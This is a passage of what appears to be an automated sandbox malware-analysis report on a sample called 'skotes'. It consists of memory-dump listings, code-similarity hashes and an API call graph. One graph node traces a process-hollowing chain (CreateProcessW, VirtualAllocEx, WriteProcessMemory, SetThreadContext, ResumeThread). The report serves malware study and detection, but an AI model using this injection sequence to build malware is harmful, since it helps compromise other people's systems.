                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateSemaphore
                                                                                                                                                                                            • String ID: eb
                                                                                                                                                                                            • API String ID: 1078844751-1594297098
                                                                                                                                                                                            • Opcode ID: 22e090364e6c441b886e1191c3ad658ef8d899e3d809a1dd0044fb1134040d97
                                                                                                                                                                                            • Instruction ID: 826e71bfd1f35bc8303ea30f2cceeac258500a0907a0ceb62274516290253dfe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 22e090364e6c441b886e1191c3ad658ef8d899e3d809a1dd0044fb1134040d97
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF0B736545129ABCF129F50EC158DE7F67FB08761B085015FD0596230C772D961EF90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0062B94E
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0062B961
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pContext
                                                                                                                                                                                            • API String ID: 548886458-2046700901
                                                                                                                                                                                            • Opcode ID: 61c627b6c3d3ac1293f14b544774d63a5a7cde0213e6086d2ead5b37232721fa
                                                                                                                                                                                            • Instruction ID: dfcea0e2a2d217ac5fff9c4782f0ed54407eb62bea452194c90d580ddd26d944
                                                                                                                                                                                            • Opcode Fuzzy Hash: 61c627b6c3d3ac1293f14b544774d63a5a7cde0213e6086d2ead5b37232721fa
                                                                                                                                                                                            • Instruction Fuzzy Hash: A2E06839B002146BCF04F764E849C9DF77B9EC4721F044019EA12A3380EB71EA44CAD4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006234FC
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                            • String ID: pScheduler$version
                                                                                                                                                                                            • API String ID: 2141394445-3154422776
                                                                                                                                                                                            • Opcode ID: 896c60cef01d728b7a8961bc32eb96f8ae6a0c1ad8c3de448a5f9d6da84588de
                                                                                                                                                                                            • Instruction ID: 8bf7a2855f249c5c411955e9d6e842c222b82454c291fb66c871ff58bd0095e6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 896c60cef01d728b7a8961bc32eb96f8ae6a0c1ad8c3de448a5f9d6da84588de
                                                                                                                                                                                            • Instruction Fuzzy Hash: 46E08634940728B6CF26FA54E847BDC77AA9B1474AF04C155BC11152919BF997CCCE81

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:4.4%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0.6%
                                                                                                                                                                                            Signature Coverage:0.9%
                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                            Total number of Limit Nodes:22
                                                                                                                                                                                            execution_graph 15385 94519e 15389 9451d4 15385->15389 15386 945321 GetPEB 15387 945333 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 15386->15387 15388 9453da WriteProcessMemory 15387->15388 15387->15389 15390 94541f 15388->15390 15389->15386 15389->15387 15391 9453ca TerminateProcess 15389->15391 15392 945424 WriteProcessMemory 15390->15392 15393 945461 WriteProcessMemory Wow64SetThreadContext ResumeThread 15390->15393 15391->15389 15392->15390 15427 9242bc 15428 9242c8 15427->15428 15432 9242ff 15428->15432 15433 92cc2c 15428->15433 15430 9242ec 15430->15432 15437 924362 15430->15437 15434 92cc3f _Fputc 15433->15434 15441 92cc99 15434->15441 15436 92cc54 _Fputc 15436->15430 15438 924381 15437->15438 15440 9243a3 15438->15440 15475 928719 15438->15475 15440->15432 15442 92ccab 15441->15442 15444 92ccce 15441->15444 15443 92b601 _Fputc 29 API calls 15442->15443 15445 92ccc6 15443->15445 15444->15442 15446 92ccf5 15444->15446 15445->15436 15449 92cdcf 15446->15449 15450 92cddb ___scrt_is_nonwritable_in_current_image 15449->15450 15457 92875f EnterCriticalSection 15450->15457 15452 92cde9 15458 92cd2f 15452->15458 15454 92cdf6 15467 92ce1e 15454->15467 15457->15452 15459 92bc27 ___scrt_uninitialize_crt 64 API calls 15458->15459 15460 92cd4a 15459->15460 15470 930d89 15460->15470 15463 92cd6f 15463->15454 15464 92f807 __dosmaperr 14 API calls 15465 92cd93 15464->15465 15466 92e4f7 ___free_lconv_mon 14 API calls 15465->15466 15466->15463 15474 928773 LeaveCriticalSection 15467->15474 15469 92cd2d 15469->15436 15471 930da0 15470->15471 15472 92cd54 15470->15472 15471->15472 15473 92e4f7 ___free_lconv_mon 14 API calls 15471->15473 15472->15463 15472->15464 15473->15472 15474->15469 15476 928725 15475->15476 15479 92873a 15475->15479 15477 92ad6d __dosmaperr 14 API calls 15476->15477 15478 92872a 15477->15478 15480 92b458 __strnicoll 29 API calls 15478->15480 15479->15440 15481 928735 15480->15481 15481->15440 17025 923fa3 17026 923fb9 _Yarn 17025->17026 17027 923fbf 17026->17027 17028 924065 17026->17028 17031 92c32c 17026->17031 17028->17027 17030 92c32c __fread_nolock 45 API calls 17028->17030 17030->17027 17034 92c28f 17031->17034 17035 92c29b ___scrt_is_nonwritable_in_current_image 17034->17035 17036 92c2d3 17035->17036 17037 92c2e5 17035->17037 17038 92c2ae __fread_nolock 17035->17038 17036->17026 17047 92875f EnterCriticalSection 17037->17047 17041 92ad6d __dosmaperr 14 API calls 17038->17041 17040 92c2ef 17048 92c349 17040->17048 17043 92c2c8 17041->17043 17045 92b458 __strnicoll 29 API calls 17043->17045 17045->17036 17047->17040 17049 92c35b __fread_nolock 17048->17049 17055 92c306 17048->17055 17050 92c368 17049->17050 17049->17055 17057 92c3b9 17049->17057 17051 92ad6d __dosmaperr 14 API calls 17050->17051 17052 92c36d 17051->17052 17053 92b458 __strnicoll 29 API calls 17052->17053 17053->17055 17054 935d52 __fread_nolock 43 API calls 17054->17057 17062 92c324 17055->17062 17056 92c4e4 __fread_nolock 17060 92ad6d __dosmaperr 14 API calls 17056->17060 17057->17054 17057->17055 17057->17056 17058 92c20e __fread_nolock 29 API calls 17057->17058 17059 930efc __fread_nolock 29 API calls 17057->17059 17061 93625d __fread_nolock 41 API calls 17057->17061 17058->17057 17059->17057 17060->17052 17061->17057 17065 928773 LeaveCriticalSection 17062->17065 17064 92c32a 17064->17036 17065->17064 13335 9257d0 13336 9257dc ___scrt_is_nonwritable_in_current_image 13335->13336 13362 922baf 13336->13362 13338 9257e3 13339 92593c 13338->13339 13347 92580d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 13338->13347 13398 925020 IsProcessorFeaturePresent 13339->13398 13341 925943 13342 925949 13341->13342 13402 928bd6 13341->13402 13405 928bec 13342->13405 13346 92582c 13347->13346 13348 9258ad 13347->13348 13350 9258a6 13347->13350 13380 92b145 13348->13380 13373 928c20 13350->13373 13352 9258b3 13384 94804b 13352->13384 13357 9258d8 13358 9258e1 13357->13358 13389 928c02 13357->13389 13392 922be8 13358->13392 13363 922bb8 13362->13363 13408 924c8c IsProcessorFeaturePresent 13363->13408 13367 922bc9 13372 922bcd 13367->13372 13418 92867a 13367->13418 13370 922be4 13370->13338 13372->13338 13374 928c36 std::_Locinfo::_Locinfo_dtor 13373->13374 13375 92cf0b ___scrt_is_nonwritable_in_current_image 13373->13375 13374->13348 13490 92e783 GetLastError 13375->13490 13381 92b153 13380->13381 13382 92b14e 13380->13382 13381->13352 13863 92b26e 13382->13863 14466 948000 GetModuleHandleA GetModuleFileNameA ExitProcess 13384->14466 13387 924fcd GetModuleHandleW 13388 924fd9 13387->13388 13388->13341 13388->13357 14469 928d21 13389->14469 13393 922bf4 13392->13393 13395 922c0a 13393->13395 14540 92868c 13393->14540 13395->13346 13396 922c02 13397 926188 ___scrt_uninitialize_crt 7 API calls 13396->13397 13397->13395 13399 925036 __fread_nolock std::locale::_Setgloballocale 13398->13399 13400 9250e1 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13399->13400 13401 925125 std::locale::_Setgloballocale 13400->13401 13401->13341 13403 928d21 std::locale::_Setgloballocale 21 API calls 13402->13403 13404 928be7 13403->13404 13404->13342 13406 928d21 std::locale::_Setgloballocale 21 API calls 13405->13406 13407 925951 13406->13407 13409 922bc4 13408->13409 13410 926169 13409->13410 13427 92e1c6 13410->13427 13413 926172 13413->13367 13415 92617a 13416 926185 13415->13416 13441 92e202 13415->13441 13416->13367 13481 930815 13418->13481 13421 926188 13422 926191 13421->13422 13423 92619b 13421->13423 13424 92d297 ___vcrt_uninitialize_ptd 6 API calls 13422->13424 13423->13372 13425 926196 13424->13425 13426 92e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13425->13426 13426->13423 13429 92e1cf 13427->13429 13430 92e1f8 13429->13430 13432 92616e 13429->13432 13445 937e4b 13429->13445 13431 92e202 ___vcrt_uninitialize_locks DeleteCriticalSection 13430->13431 13431->13432 13432->13413 13433 92d264 13432->13433 13462 937d5c 13433->13462 13436 92d279 13436->13415 13439 92d294 13439->13415 13442 92e22c 13441->13442 13443 92e20d 13441->13443 13442->13413 13444 92e217 DeleteCriticalSection 13443->13444 13444->13442 13444->13444 13450 937edd 13445->13450 13448 937e83 InitializeCriticalSectionAndSpinCount 13449 937e6e 13448->13449 13449->13429 13451 937e65 13450->13451 13454 937efe 13450->13454 13451->13448 13451->13449 13452 937f66 GetProcAddress 13452->13451 13454->13451 13454->13452 13455 937f57 13454->13455 13457 937e92 LoadLibraryExW 13454->13457 13455->13452 13456 937f5f FreeLibrary 13455->13456 13456->13452 13458 937ea9 GetLastError 13457->13458 13459 937ed9 13457->13459 13458->13459 13460 937eb4 ___vcrt_FlsFree 13458->13460 13459->13454 13460->13459 13461 937eca LoadLibraryExW 13460->13461 13461->13454 13463 937edd ___vcrt_FlsFree 5 API calls 13462->13463 13464 937d76 13463->13464 13465 937d8f TlsAlloc 13464->13465 13466 92d26e 13464->13466 13466->13436 13467 937e0d 13466->13467 13468 937edd ___vcrt_FlsFree 5 API calls 13467->13468 13469 937e27 13468->13469 13470 937e42 TlsSetValue 13469->13470 13471 92d287 13469->13471 13470->13471 13471->13439 13472 92d297 13471->13472 13473 92d2a1 13472->13473 13474 92d2a7 13472->13474 13476 937d97 13473->13476 13474->13436 13477 937edd ___vcrt_FlsFree 5 API calls 13476->13477 13478 937db1 13477->13478 13479 937dc9 TlsFree 13478->13479 13480 937dbd 13478->13480 13479->13480 13480->13474 13482 930825 13481->13482 13483 922bd6 13481->13483 13482->13483 13485 92ff89 13482->13485 13483->13370 13483->13421 13486 92ff90 13485->13486 13487 92ffd3 GetStdHandle 13486->13487 13488 930035 13486->13488 13489 92ffe6 GetFileType 13486->13489 13487->13486 13488->13482 13489->13486 13491 92e799 13490->13491 13494 92e79f 13490->13494 13528 92f19b 13491->13528 13514 92e7a3 SetLastError 13494->13514 13533 92f1da 13494->13533 13498 92cf1c 13517 92b9c2 13498->13517 13499 92e838 13501 92b9c2 CallUnexpected 37 API calls 13499->13501 13505 92e83d 13501->13505 13502 92e7d8 13506 92f1da __dosmaperr 6 API calls 13502->13506 13503 92e7e9 13504 92f1da __dosmaperr 6 API calls 13503->13504 13508 92e7f5 13504->13508 13507 92e7e6 13506->13507 13545 92e4f7 13507->13545 13509 92e810 13508->13509 13510 92e7f9 13508->13510 13551 92ea94 13509->13551 13511 92f1da __dosmaperr 6 API calls 13510->13511 13511->13507 13514->13498 13514->13499 13516 92e4f7 ___free_lconv_mon 14 API calls 13516->13514 13752 9308cc 13517->13752 13520 92b9d2 13522 92b9dc IsProcessorFeaturePresent 13520->13522 13527 92b9fb 13520->13527 13523 92b9e8 13522->13523 13782 92b4b9 13523->13782 13524 928bec std::locale::_Setgloballocale 21 API calls 13526 92ba05 13524->13526 13527->13524 13556 92f534 13528->13556 13530 92f1b7 13531 92f1d2 TlsGetValue 13530->13531 13532 92f1c0 13530->13532 13532->13494 13534 92f534 std::_Locinfo::_Locinfo_dtor 5 API calls 13533->13534 13535 92f1f6 13534->13535 13536 92f214 TlsSetValue 13535->13536 13537 92e7bb 13535->13537 13537->13514 13538 92f807 13537->13538 13543 92f814 __dosmaperr 13538->13543 13539 92f854 13573 92ad6d 13539->13573 13540 92f83f HeapAlloc 13542 92e7d0 13540->13542 13540->13543 13542->13502 13542->13503 13543->13539 13543->13540 13570 928f08 13543->13570 13546 92e502 HeapFree 13545->13546 13547 92e52c 13545->13547 13546->13547 13548 92e517 GetLastError 13546->13548 13547->13514 13549 92e524 __dosmaperr 13548->13549 13550 92ad6d __dosmaperr 12 API calls 13549->13550 13550->13547 13610 92ebfa 13551->13610 13557 92f564 13556->13557 13561 92f560 std::_Locinfo::_Locinfo_dtor 13556->13561 13557->13561 13562 92f469 13557->13562 13560 92f57e GetProcAddress 13560->13561 13561->13530 13567 92f47a ___vcrt_FlsFree 13562->13567 13563 92f498 LoadLibraryExW 13564 92f4b3 GetLastError 13563->13564 13565 